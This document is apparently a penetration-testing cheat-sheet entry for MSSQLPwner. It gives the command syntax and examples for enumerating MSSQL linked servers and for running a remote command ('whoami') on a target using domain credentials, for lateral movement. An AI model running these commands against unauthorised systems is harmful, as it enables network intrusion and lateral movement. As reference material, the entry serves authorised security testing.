MSSQLPwner Linked Server Abuse

Enumerate and abuse MSSQL linked servers for lateral movement

Tool
mssqlpwner
Category
Lateral Movement / MSSQL
Platform
linux
Requires
password
Protocols
MSSQL

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

mssqlpwner '<domain>/<user>:<password>'@<ip> -windows-auth enumerate

Credential variants

The same attack using a different authentication material.

Execute Command requires password

mssqlpwner '<domain>/<user>:<password>'@<ip> -windows-auth exec -command 'whoami'

Examples

mssqlpwner 'corp.local/user:password'@192.168.1.56 -windows-auth enumerate
mssqlpwner 'corp.local/user:password'@192.168.1.56 -windows-auth exec -command 'whoami'

Tags

mssqlpwner mssql linked-server lateral-movement enumeration